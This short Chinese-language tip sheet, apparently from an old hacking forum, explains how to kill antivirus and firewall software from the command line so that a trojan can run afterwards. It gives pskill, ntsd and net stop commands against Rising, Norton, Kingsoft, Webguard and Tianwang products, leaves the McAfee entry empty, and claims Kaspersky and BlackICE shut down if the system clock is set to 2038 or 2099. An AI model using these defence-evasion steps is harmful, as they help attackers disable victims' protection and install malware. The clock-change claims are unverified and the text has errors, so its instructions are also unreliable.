要突破杀软的主动防御我们可以先结束杀软的进程，然后在运行我们的木马。 下面是命在令行下杀掉各种杀毒和安全软件的方法汇总。    Ø   在命令行下请用ntsd –c -q -p PID或者使用c:\pskill.exe ravmon命令来杀掉瑞星软件 Ø   关于诺顿企业版“文件自动防护“的关闭方法： 1）关闭服务：net stop "Symantec AntiVirus"   关闭成功！ 2)关闭进程：Rtvscan，CCAPP，vptray，defwatch，等等所有诺顿进程全部关闭成功！试运行木马，被删除，证明诺顿“文件自动防护”功能仍在运行！ Ø   关闭webguard主页防修改软件的方法： c:\pskill.exe syncserver net stop fmdaemon Ø   关闭金山杀毒： net stop KAVStart或直接c:\pskill kavstart / KWatch 关闭天网防火墙： c:\pskill.exe pfw Ø   关闭macfee软件: Ø 如何关闭卡巴 把时间调到2038之后.卡巴出现错误.自动关闭! Ø 关闭blackice防火墙 将时间调到2099年，发现blackice服务停止